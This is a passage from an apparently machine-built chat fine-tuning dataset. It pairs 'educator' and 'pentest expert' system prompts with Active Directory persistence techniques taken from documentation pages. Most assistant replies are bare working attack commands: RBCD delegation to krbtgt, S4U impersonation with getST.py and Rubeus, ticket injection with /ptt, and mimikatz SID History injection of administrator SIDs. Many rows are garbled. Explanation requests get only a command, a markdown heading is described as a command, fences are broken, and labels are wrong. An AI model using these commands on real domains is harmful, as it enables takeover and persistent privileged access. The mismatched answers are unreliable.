syntax.", "user": "How to execute Delegation to KRBTGT - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\nEvery step of this attack can be achieved using one of the following scripts from Impacket (Python), such as rbcd.py and getST.py.\n\n```bash", "metadata": {"corpus_index": 1221, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt in the context of penetration testing"}, {"role": "assistant", "content": "rbcd.py -delegate-from 'ControlledAccountWithSPN' -delegate-to 'krbtgt' -dc-ip $dcIp -action write 'DOMAIN'/'PrivilegiedAccount':'StrongPassword'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt in the context of penetration testing", "response": "rbcd.py -delegate-from 'ControlledAccountWithSPN' -delegate-to 'krbtgt' -dc-ip $dcIp -action write 'DOMAIN'/'PrivilegiedAccount':'StrongPassword'", "metadata": {"corpus_index": 1222, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt"}, {"role": "assistant", "content": "rbcd.py -delegate-from 'ControlledAccountWithSPN' -delegate-to 'krbtgt' -dc-ip $dcIp -action write 'DOMAIN'/'PrivilegiedAccount':'StrongPassword'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt", "response": "rbcd.py -delegate-from 'ControlledAccountWithSPN' -delegate-to 'krbtgt' -dc-ip $dcIp -action write 'DOMAIN'/'PrivilegiedAccount':'StrongPassword'", "metadata": {"corpus_index": 1222, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Step 2 : S4U attack for TargetedAccount to ControlledAccountWithSPN?"}, {"role": "assistant", "content": "getST.py -spn \"KRBTGT\" -impersonate \"TargetedAccount\" -dc-ip $dcIp 'DOMAIN'/'ControlledAccountWithSPN':'PasswordOfControlledAccountWithSPN'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Step 2 : S4U attack for TargetedAccount to ControlledAccountWithSPN?", "response": "getST.py -spn \"KRBTGT\" -impersonate \"TargetedAccount\" -dc-ip $dcIp 'DOMAIN'/'ControlledAccountWithSPN':'PasswordOfControlledAccountWithSPN'", "metadata": {"corpus_index": 1223, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Step 2 : S4U attack for TargetedAccount to ControlledAccountWithSPN"}, {"role": "assistant", "content": "getST.py -spn \"KRBTGT\" -impersonate \"TargetedAccount\" -dc-ip $dcIp 'DOMAIN'/'ControlledAccountWithSPN':'PasswordOfControlledAccountWithSPN'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Step 2 : S4U attack for TargetedAccount to ControlledAccountWithSPN", "response": "getST.py -spn \"KRBTGT\" -impersonate \"TargetedAccount\" -dc-ip $dcIp 'DOMAIN'/'ControlledAccountWithSPN':'PasswordOfControlledAccountWithSPN'", "metadata": {"corpus_index": 1223, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT).?"}, {"role": "assistant", "content": "KRB5CCNAME='TargetedAccount@krbtgt_DOMAIN@DOMAIN.ccache' getST.py -spn 'cifs/target' -k -no-pass 'DOMAIN'/'TargetedAccount'\n``\n\n=== Windows\n\nEvery step of this attack can be achieved using Rubeus and the Set-ADUser command.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT).?", "response": "KRB5CCNAME='TargetedAccount@krbtgt_DOMAIN@DOMAIN.ccache' getST.py -spn 'cifs/target' -k -no-pass 'DOMAIN'/'TargetedAccount'\n``\n\n=== Windows\n\nEvery step of this attack can be achieved using Rubeus and the Set-ADUser command.\n\n``powershell", "metadata": {"corpus_index": 1224, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT).?"}, {"role": "assistant", "content": "KRB5CCNAME='TargetedAccount@krbtgt_DOMAIN@DOMAIN.ccache' getST.py -spn 'cifs/target' -k -no-pass 'DOMAIN'/'TargetedAccount'\n``\n\n=== Windows\n\nEvery step of this attack can be achieved using Rubeus and the Set-ADUser command.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT).?", "response": "KRB5CCNAME='TargetedAccount@krbtgt_DOMAIN@DOMAIN.ccache' getST.py -spn 'cifs/target' -k -no-pass 'DOMAIN'/'TargetedAccount'\n``\n\n=== Windows\n\nEvery step of this attack can be achieved using Rubeus and the Set-ADUser command.\n\n``powershell", "metadata": {"corpus_index": 1224, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT).?"}, {"role": "assistant", "content": "=== Windows\n\nEvery step of this attack can be achieved using Rubeus and the Set-ADUser command."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT).?", "response": "=== Windows\n\nEvery step of this attack can be achieved using Rubeus and the Set-ADUser command.", "metadata": {"corpus_index": 1225, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for step 3 : get service ticket for targetedaccount to the target service using the previously obtained ticket (which is a tgt).. Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for step 3 : get service ticket for targetedaccount to the target service using the previously obtained ticket (which is a tgt).. Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT).", "metadata": {"corpus_index": 1225, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt"}, {"role": "assistant", "content": "Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount ControlledAccountWithSPN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt", "response": "Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount ControlledAccountWithSPN", "metadata": {"corpus_index": 1226, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt"}, {"role": "assistant", "content": "Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount ControlledAccountWithSPN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt", "response": "Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount ControlledAccountWithSPN", "metadata": {"corpus_index": 1226, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Step 2 : Full S4U for TargetedAccount to krbtgt using ControlledAccountWithSPN?"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /impersonateuser:\"TargetedAccount\" /msdsspn:\"krbtgt\" /domain:\"DOMAIN\" /user:\"ControlledAccountWithSPN\" /rc4:$NThash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Step 2 : Full S4U for TargetedAccount to krbtgt using ControlledAccountWithSPN?", "response": "Rubeus.exe s4u /nowrap /impersonateuser:\"TargetedAccount\" /msdsspn:\"krbtgt\" /domain:\"DOMAIN\" /user:\"ControlledAccountWithSPN\" /rc4:$NThash", "metadata": {"corpus_index": 1227, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Step 2 : Full S4U for TargetedAccount to krbtgt using ControlledAccountWithSPN?"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /impersonateuser:\"TargetedAccount\" /msdsspn:\"krbtgt\" /domain:\"DOMAIN\" /user:\"ControlledAccountWithSPN\" /rc4:$NThash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Step 2 : Full S4U for TargetedAccount to krbtgt using ControlledAccountWithSPN?", "response": "Rubeus.exe s4u /nowrap /impersonateuser:\"TargetedAccount\" /msdsspn:\"krbtgt\" /domain:\"DOMAIN\" /user:\"ControlledAccountWithSPN\" /rc4:$NThash", "metadata": {"corpus_index": 1227, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (printed in a base64 blob thanks to the /nowrap flag), and inject it in memory using /ptt in order to use the resulting ticket for authentication to remote resources"}, {"role": "assistant", "content": "Rubeus.exe asktgs /service:\"cifs/target\" /ticket:\"base64ticket....\" /ptt\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (printed in a base64 blob thanks to the /nowrap flag), and inject it in memory using /ptt in order to use the resulting ticket for authentication to remote resources", "response": "Rubeus.exe asktgs /service:\"cifs/target\" /ticket:\"base64ticket....\" /ptt\n```\n\n:::", "metadata": {"corpus_index": 1228, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (printed in a base64 blob thanks to the /nowrap flag), and inject it in memory using /ptt in order to use the resulting ticket for authentication to remote resources?"}, {"role": "assistant", "content": "Rubeus.exe asktgs /service:\"cifs/target\" /ticket:\"base64ticket....\" /ptt\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (printed in a base64 blob thanks to the /nowrap flag), and inject it in memory using /ptt in order to use the resulting ticket for authentication to remote resources?", "response": "Rubeus.exe asktgs /service:\"cifs/target\" /ticket:\"base64ticket....\" /ptt\n```\n\n:::", "metadata": {"corpus_index": 1228, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Forged tickets"}, {"role": "assistant", "content": "Silver, Golden, Diamond and Sapphire tickets are similar variants of forged Kerberos tickets, for different purposes and stealth levels, that can be used with pass-the-ticket to access services in an Active Directory domain.\n\n* When one of krbtgt's Kerberos keys is known, a golden ticket (or diamond, or sapphire) attack can be conducted to keep privileged access until that account's password is changed.\n* Let service be an account in charge of various services indicated in its ServicePrincipalNames attribute, when one of service's Kerberos keys is known, a silver ticket attack can be conducted to keep privileged access to those managed services until that account's password is changed."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Forged tickets", "response": "Silver, Golden, Diamond and Sapphire tickets are similar variants of forged Kerberos tickets, for different purposes and stealth levels, that can be used with pass-the-ticket to access services in an Active Directory domain.\n\n* When one of krbtgt's Kerberos keys is known, a golden ticket (or diamond, or sapphire) attack can be conducted to keep privileged access until that account's password is changed.\n* Let service be an account in charge of various services indicated in its ServicePrincipalNames attribute, when one of service's Kerberos keys is known, a silver ticket attack can be conducted to keep privileged access to those managed services until that account's password is changed.", "metadata": {"corpus_index": 1229, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/forged-tickets.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Forged tickets?"}, {"role": "assistant", "content": "Silver, Golden, Diamond and Sapphire tickets are similar variants of forged Kerberos tickets, for different purposes and stealth levels, that can be used with pass-the-ticket to access services in an Active Directory domain.\n\n* When one of krbtgt's Kerberos keys is known, a golden ticket (or diamond, or sapphire) attack can be conducted to keep privileged access until that account's password is changed.\n* Let service be an account in charge of various services indicated in its ServicePrincipalNames attribute, when one of service's Kerberos keys is known, a silver ticket attack can be conducted to keep privileged access to those managed services until that account's password is changed."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Forged tickets?", "response": "Silver, Golden, Diamond and Sapphire tickets are similar variants of forged Kerberos tickets, for different purposes and stealth levels, that can be used with pass-the-ticket to access services in an Active Directory domain.\n\n* When one of krbtgt's Kerberos keys is known, a golden ticket (or diamond, or sapphire) attack can be conducted to keep privileged access until that account's password is changed.\n* Let service be an account in charge of various services indicated in its ServicePrincipalNames attribute, when one of service's Kerberos keys is known, a silver ticket attack can be conducted to keep privileged access to those managed services until that account's password is changed.", "metadata": {"corpus_index": 1229, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/forged-tickets.md", "page_title": "Forged tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Shadow Principals (PAM) - Theory"}, {"role": "assistant", "content": "When a Bastion Forest is compromised, there are multiple ways to obtain persistence on the forest it manages (i.e. called \"Production Forest\" here).\n\n1. Mark a low-privilege user from the Production Forest as an Shadow Security Principal in the Bastion Forest\n2. Modify a Shadow Principal Object's DACL: add ACEs over a Shadow Principal Object (at least Read Members and Write Members) allowing a controlled user add and remove principals at will (in the member attribute."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Shadow Principals (PAM) - Theory", "response": "When a Bastion Forest is compromised, there are multiple ways to obtain persistence on the forest it manages (i.e. called \"Production Forest\" here).\n\n1. Mark a low-privilege user from the Production Forest as an Shadow Security Principal in the Bastion Forest\n2. Modify a Shadow Principal Object's DACL: add ACEs over a Shadow Principal Object (at least Read Members and Write Members) allowing a controlled user add and remove principals at will (in the member attribute.", "metadata": {"corpus_index": 1230, "category": "web", "source_file": "docs/src/ad/persistence/shadow-principals.md", "page_title": "Shadow Principals (PAM)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Shadow Principals (PAM) - Theory during a pentest?"}, {"role": "assistant", "content": "When a Bastion Forest is compromised, there are multiple ways to obtain persistence on the forest it manages (i.e. called \"Production Forest\" here).\n\n1. Mark a low-privilege user from the Production Forest as an Shadow Security Principal in the Bastion Forest\n2. Modify a Shadow Principal Object's DACL: add ACEs over a Shadow Principal Object (at least Read Members and Write Members) allowing a controlled user add and remove principals at will (in the member attribute."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Shadow Principals (PAM) - Theory during a pentest?", "response": "When a Bastion Forest is compromised, there are multiple ways to obtain persistence on the forest it manages (i.e. called \"Production Forest\" here).\n\n1. Mark a low-privilege user from the Production Forest as an Shadow Security Principal in the Bastion Forest\n2. Modify a Shadow Principal Object's DACL: add ACEs over a Shadow Principal Object (at least Read Members and Write Members) allowing a controlled user add and remove principals at will (in the member attribute.", "metadata": {"corpus_index": 1230, "category": "web", "source_file": "docs/src/ad/persistence/shadow-principals.md", "page_title": "Shadow Principals (PAM)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SID History - Practice"}, {"role": "assistant", "content": "> [!CAUTION]\n> There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some operations on specific Windows processes' memory."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SID History - Practice", "response": "> [!CAUTION]\n> There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some operations on specific Windows processes' memory.", "metadata": {"corpus_index": 1231, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SID History - Practice?"}, {"role": "assistant", "content": "> [!CAUTION]\n> There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some operations on specific Windows processes' memory."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SID History - Practice?", "response": "> [!CAUTION]\n> There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some operations on specific Windows processes' memory.", "metadata": {"corpus_index": 1231, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of SID History - Pre-Windows 2016"}, {"role": "assistant", "content": "Modifying the SID History attribute of an object can be done using mimikatz, with the sid::patch, sid::add and sid::lookup commands.\n\nMimikatz cannot be used on 2016+ domain controllers for that purpose, due to an error with sid::patch (https://github.com/gentilkiwi/mimikatz/issues/348)\n\n> [!WARNING]\n> Mimikatz must be launched with at least enough privileges to perform the privilege::debug command (i.e. domain admin or SYSTEM).\n\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of SID History - Pre-Windows 2016", "response": "Modifying the SID History attribute of an object can be done using mimikatz, with the sid::patch, sid::add and sid::lookup commands.\n\nMimikatz cannot be used on 2016+ domain controllers for that purpose, due to an error with sid::patch (https://github.com/gentilkiwi/mimikatz/issues/348)\n\n> [!WARNING]\n> Mimikatz must be launched with at least enough privileges to perform the privilege::debug command (i.e. domain admin or SYSTEM).\n\n```powershell", "metadata": {"corpus_index": 1232, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform SID History - Pre-Windows 2016?"}, {"role": "assistant", "content": "Modifying the SID History attribute of an object can be done using mimikatz, with the sid::patch, sid::add and sid::lookup commands.\n\nMimikatz cannot be used on 2016+ domain controllers for that purpose, due to an error with sid::patch (https://github.com/gentilkiwi/mimikatz/issues/348)\n\n> [!WARNING]\n> Mimikatz must be launched with at least enough privileges to perform the privilege::debug command (i.e. domain admin or SYSTEM).\n\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform SID History - Pre-Windows 2016?", "response": "Modifying the SID History attribute of an object can be done using mimikatz, with the sid::patch, sid::add and sid::lookup commands.\n\nMimikatz cannot be used on 2016+ domain controllers for that purpose, due to an error with sid::patch (https://github.com/gentilkiwi/mimikatz/issues/348)\n\n> [!WARNING]\n> Mimikatz must be launched with at least enough privileges to perform the privilege::debug command (i.e. domain admin or SYSTEM).\n\n```powershell", "metadata": {"corpus_index": 1232, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Generic command"}, {"role": "assistant", "content": "mikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:UserRecievingTheSID /new:SIDOfTheTargetedUserOrGroup\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Generic command", "response": "mikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:UserRecievingTheSID /new:SIDOfTheTargetedUserOrGroup\"", "metadata": {"corpus_index": 1233, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Generic command"}, {"role": "assistant", "content": "mikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:UserRecievingTheSID /new:SIDOfTheTargetedUserOrGroup\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Generic command", "response": "mikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:UserRecievingTheSID /new:SIDOfTheTargetedUserOrGroup\"", "metadata": {"corpus_index": 1233, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Example 1 : Use this command to inject the SID of built-in administrator account to the SID-History attribute of AttackerUser"}, {"role": "assistant", "content": "mikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:AttackerUser /new:Builtin\\administrators \""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Example 1 : Use this command to inject the SID of built-in administrator account to the SID-History attribute of AttackerUser", "response": "mikikatz.exe \"privilege::debug\" \"sid::patch\" \"sid::add /sam:AttackerUser /new:Builtin\\administrators \"", "metadata": {"corpus_index": 1234, "category": "active_directory", "source_file": "docs/src/ad/persistence/sid-history.md", "page_title": "SID History", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You 